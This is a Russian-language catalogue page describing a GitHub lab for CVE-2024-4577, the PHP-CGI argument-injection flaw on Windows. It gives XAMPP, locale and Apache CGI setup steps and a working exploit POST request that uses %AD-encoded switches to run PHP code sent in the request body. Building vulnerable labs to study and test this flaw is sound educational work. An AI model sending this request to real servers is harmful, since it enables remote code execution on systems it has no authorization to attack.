Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-4577 — Создать лабораторию для CVE-2024-4577 | Kitploit
Инструменты/GitHubGitHub/alpereny-cs/cve-2024-4577
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

Создать лабораторию для CVE-2024-4577

Репозиторий
272 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-4577 - RCE через внедрение аргументов PHP-CGI

CVEОписаниеCVSSv3
CVE-2024-4577Уязвимость внедрения аргументов PHP-CGI9.8

«CVE-2024-4577 — это критическая уязвимость внедрения аргументов в PHP, которая может быть использована для удаленного выполнения кода (RCE). По мнению исследователей из DEVCORE, эта ошибка является результатом проблем в преобразованиях кодировок символов, затрагивающих функцию «Best Fit» в Windows.»
-Tenable

Создание лабораторной среды для CVE-2024-4577

Загрузка XAMPP

Загрузите XAMPP (8.1.25 / PHP 8.1.25) После установки XAMPP проверьте версию PHP. Она должна быть 8.1.25. Версию PHP можно проверить, выполнив команду php -v из командной строки. Если возникает ошибка, необходимо добавить PHP в переменную PATH.

Установка локали

Необходимо изменить локаль. Для этого перейдите в Панель управления > Часы и регион > Регион. Установите формат на японский, традиционный китайский или упрощенный китайский. Нажмите «Администрирование» > «Изменить системную локаль» и выберите соответствующую локаль.

Настройка Apache

Если PHP не работает в режиме CGI, выполните следующие настройки.

  • Скопируйте php.exe или php-cgi.exe в папку /cgi/bin/.
  • Добавьте эти строки в \xampp\apache\conf\httpd.conf ⬇️
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • Откройте httpd-xampp.conf и найдите строку LoadModule php_module "C:/xampp/php/php8apache2_4.dll". Поставьте '#' в начало строки.

Запуск Apache

Сохраните изменения и запустите экземпляр Apache.

Эксплуатация

Если в ответе отобразится результат выполнения PHP-кода, отправленного в теле приведенного ниже POST-запроса, значит эксплуатация прошла успешно.

POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

Отказ от ответственности⚠️

Эта лабораторная среда предназначена исключительно для образовательных целей и не должна использоваться в рабочих средах. Я не несу ответственности за любой ущерб или убытки, которые могут возникнуть в результате неправильного использования. Пользователи должны использовать эту среду на свой страх и риск.

Скачать инструмент